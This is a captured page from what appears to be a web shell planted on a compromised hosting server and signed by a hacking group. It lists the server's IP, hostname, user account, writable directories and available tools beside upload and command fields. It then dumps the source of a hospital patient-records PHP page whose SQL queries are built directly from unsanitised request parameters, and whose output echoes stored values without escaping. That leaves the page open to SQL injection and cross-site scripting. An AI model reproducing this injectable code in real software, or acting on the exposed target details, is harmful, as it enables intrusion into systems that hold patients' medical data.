Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.226.172.240
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in/edit_showpage_Routine_Information.php
<?php session_start();
include 'dbconnection.php';
require_once("../patientmanager.php");
require_once("../DBManager.php");
include 'dashboarddocument.php';
include 'header.php';
if(isset($_POST['Routine_Information'])) 
{
  	$updated_at=date("F d, Y / h:i:s A");
$sql ="UPDATE Routine_Information SET Information_Obtained_from='$_POST[Information_Obtained_from]',Date_of_Operative_procedure='$_POST[Date_of_Operative_procedure]',Time_of_Operative_procedure='$_POST[Time_of_Operative_procedure]',name_Surgeon='$_POST[name_Surgeon]',Name_of_Anesthetist='$_POST[Name_of_Anesthetist]',Pre_Operative_Diagnosis='$_POST[Pre_Operative_Diagnosis]',Systemic_Disease='$_POST[Systemic_Disease]',Systemic_Disease_note='$_POST[Systemic_Disease_note]',Anesthesia_Events='$_POST[Anesthesia_Events]',Anesthesia_Events_note='$_POST[Anesthesia_Events_note]',ho_Operations='$_POST[ho_Operations]',ho_Operations_note='$_POST[ho_Operations_note]',Adverse_Drugs_Reaction='$_POST[Adverse_Drugs_Reaction]',Adverse_Drugs_Reaction_note='$_POST[Adverse_Drugs_Reaction_note]',DRUG_THERAPY='$_POST[DRUG_THERAPY]',DRUG_THERAPY_note='$_POST[DRUG_THERAPY_note]',Duration_Surgery='$_POST[Duration_Surgery]',WRITTEN_CONSENT='$_POST[WRITTEN_CONSENT]' WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
$sql1 ="UPDATE save_activity SET created_at='$_POST[created_at]',updated_at='$updated_at'  WHERE prescriptionid='$_GET[prescriptionid]' AND userno='$_GET[patientid]' AND discription='Pre-Assessment Sheet<br>Routine Information<br>Doc.no-'";
if($qsql = mysqli_query($con,$sql))
		{
		    if($qsql = mysqli_query($con,$sql1))
		    {
    echo "<script>alert('Update successfully');</script><script>window.history.go(-2)</script>;</script>";
  } 
  }else {
    echo "Sorry, there was an error uploading your file.";
  } 
   
  
}

?>
<!DOCTYPE html>
<html lang="en">
<head><meta charset="ibm866">
     <style>
.switch {
  position: relative;
  display: inline-block;
  width: 90px;
  height: 34px;
}

.switch input {display:none;}

.slider {
  position: absolute;
  cursor: pointer;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: #ca2222;
  -webkit-transition: .4s;
  transition: .4s;
   border-radius: 34px;
}

.slider:before {
  position: absolute;
  content: "";
  height: 26px;
  width: 26px;
  left: 4px;
  bottom: 4px;
  background-color: white;
  -webkit-transition: .4s;
  transition: .4s;
  border-radius: 50%;
}

input:checked + .slider {
  background-color: #2ab934;
}

input:focus + .slider {
  box-shadow: 0 0 1px #2196F3;
}

input:checked + .slider:before {
  -webkit-transform: translateX(26px);
  -ms-transform: translateX(26px);
  transform: translateX(55px);
}

/*------ ADDED CSS ---------*/
.slider:after
{
 content:'No';
 color: white;
 display: block;
 position: absolute;
 transform: translate(-50%,-50%);
 top: 50%;
 left: 50%;
 font-size: 10px;
 font-family: Verdana, sans-serif;
}

input:checked + .slider:after
{  
  content:'Yes';
}



.center {
   border: 1px solid grey;
   text-align:;
}

</style>
  
<meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
  <title>Document</title>
<script>
function myFunction() {
  var checkBox = document.getElementById("myCheck");
  var text = document.getElementById("text");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
function myFunction2() {
  var checkBox = document.getElementById("myCheck2");
  var text = document.getElementById("text2");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
function myFunction3() {
  var checkBox = document.getElementById("myCheck3");
  var text = document.getElementById("text3");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}
function myFunction4() {
  var checkBox = document.getElementById("myCheck4");
  var text = document.getElementById("text4");
  if (checkBox.checked == true){
    text.style.display = "block";
  } else {
     text.style.display = "none";
  }
}


</script>
	<style>

.center {
   border: 1px solid grey;
   text-align:;
}
 </style>
   </head>
  <body>
    <div class="content-wrapper">
        <section class="content-header">
    <form name="Routine_Information" method="post" >
               <h2 align="center">Routine Information </h2>
    
               <br>
      
		<div class="center">
      <table id="example2" class="table table-bordered table-hover"> 
                  <thead>
                      <?php 
		$sql ="SELECT * FROM Routine_Information WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		 
		  
		    echo"
		      <tr><td width='50%'> Date & Time</td><td width='50%'> <input  type='text' value='$rs[created_at]' name='created_at' ></td></tr>
		  
                  <tr>
                      
          
                  <div class='account-details'>
            <tr><td style='width:29%'><div><h5>Operative Type : </h5> </td></div><td  style='width:46%'><div><select name='Information_Obtained_from'>
        <option value='$rs[Information_Obtained_from]' >$rs[Information_Obtained_from]</option>
       <option value='Routine'>Routine</option>
    <option value='Emergency'>Emergency</option>
           </select></div></td></tr>
<td><div><h5>Date of Operative procedure : </h5> </td></div><td><div><input name='Date_of_Operative_procedure' value='$rs[Date_of_Operative_procedure]' type='date'></div></td></tr>
<tr><td><div><h5>Expected Sign in of Operative procedure : </h5> </td></div><td><div><input  name='Time_of_Operative_procedure' value='$rs[Time_of_Operative_procedure]' type='time'></div></td></tr>
<tr><td><div><h5>Name of Surgeon: </h5> </td></div>

<td><div>

<select  name='name_Surgeon'>
        
        	";
        	$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
	$sqldoctor= "SELECT * FROM site_users WHERE usertype='Doctor' and entered_by='$re[entered_by]'";
			$qsqldoctor = mysqli_query($con,$sqldoctor);
			while($rsdoctor = mysqli_fetch_array($qsqldoctor))
			{
				?>
			<option value='<?php echo $rsdoctor[name] ?>'<?php if($rsdoctor[name]==$rs[name_Surgeon]){echo "selected";} ?>><?php echo $rsdoctor[name] ?></option>
			<?php }
		}

echo"
</select>
</div></td></tr>
<tr><td><div><h5>Name of Anesthetist: </h5> </td></div>
<td><div>
<select  name='Name_of_Anesthetist'>
        
        	";
        	$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re = mysqli_fetch_array($qsql1))
		{
	$sqldoctor= "SELECT * FROM site_users WHERE usertype='Doctor' and entered_by='$re[entered_by]'";
			$qsqldoctor = mysqli_query($con,$sqldoctor);
			while($rsdoctor = mysqli_fetch_array($qsqldoctor))
			{
				
				?>
			<option value='<?php echo $rsdoctor[name] ?>'<?php if($rsdoctor[name]==$rs[Name_of_Anesthetist]){echo "selected";} ?>><?php echo $rsdoctor[name] ?></option>
			<?php }
		}

echo"
</select>



</div></td></tr>






<tr><td><div><h5>Pre-Operative Diagnosis: </h5> </td></div><td><div><input type='text' placeholder='Pre-Operative Diagnosis'  value='$rs[Pre_Operative_Diagnosis]' name='Pre_Operative_Diagnosis' ></div></td></tr>
</div>
</tr>

";

echo"
<tr><td><div><h5>Expected Sign out : </h5> </td></div><td><div><input placeholder='Duration Surgery' value='$rs[Duration_Surgery]' name='Duration_Surgery' type='time'></div></td></tr>
</div>
</tr>

<tr>
   <td width='50%'>WRITTEN CONSENT 
</td>
<td width='50%'><select name='WRITTEN_CONSENT'>
        <option value='$rs[WRITTEN_CONSENT]' >$rs[WRITTEN_CONSENT]</option>
       <option value='Present'>PRESENT</option>
    <option value='ABSENT'>ABSENT </option>
           </select></td>
</tr>   
              </tr>
              
              </thead>
                  
                   </tbody>
  <tfoot>
          </tfoot>
          ";
          }
          ?>
        </table>   
        
</div>
<input type='submit' name='Routine_Information' value='Save'>
</form>
</body>
</html> 

Anon7 - 2022
AnonSec Team